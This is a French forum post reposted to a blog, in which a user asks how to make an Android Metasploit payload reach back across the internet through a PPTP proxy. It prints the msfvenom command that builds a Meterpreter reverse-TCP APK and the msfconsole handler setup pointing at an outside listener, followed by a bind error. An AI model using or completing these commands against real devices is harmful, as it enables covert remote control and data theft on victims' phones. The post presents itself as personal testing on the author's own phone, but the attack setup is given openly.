mercredi 28 octobre 2015

Besoin d'aide - configuration payload WAN avec Proxy

Bonjour :D

Cela fait quelques jours déjà que je cherche solution à mon "problème" sans résultat. Je pense que la communauté de Hackademics sera m’aiguiller.
J'ai déjà configuré un payload pour android avec Metasploit qui fonctionne en LAN. Jusque-là pas de souci.
C'est quand je veux aller plus loin et tester sur le réseau WAN que se coince. Je vais essayer de vous expliquer comment je procède

Je suis sur kali Linux 2.0, à ma disposition j'ai mon Pc portable (l’attaquant), mon smartphone android (la victime). Je dispose également d'un proxy Pptp gratuit (histoire d'avoir un Ip static).

Pour creer mon payload je fais :
Code PHP:

msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip de mon proxyLPORT=443 R app.apk 

Ensuite je le récupère l'apk que j'installe sur le smartphone.

Reste plus qu'à récupérer le signal :
Code PHP:

msfconsole
~ use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [ip du proxy]
set LPORT 443
exploit 

Et là j'obtiens :
Code PHP:

Handler failed to bind to xx.xxx.xxx.xxx:443
Started reverse handler on 0.0.0.0
:443
Starting the payload handler
... 

Selon moi le problème ne peut venir que de deux facteurs, l'ip et/ou le port. J'ai essayé sans le proxy (donc avec mon Ip internet), avec d'autres ports mais rien n'y fait.

Au final je pense que je peux résumer mon problème en une question : Comment configurer un payload en WAN avec un proxy Pptp ?

J’espère avoir été clair dans mes explications et avoir donné assez de détail. Si quelqu’un à la solution je lui en serai reconnaissant ;)

K4LIN00B


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1MU9Mcl
via IFTTT

Aucun commentaire:

Enregistrer un commentaire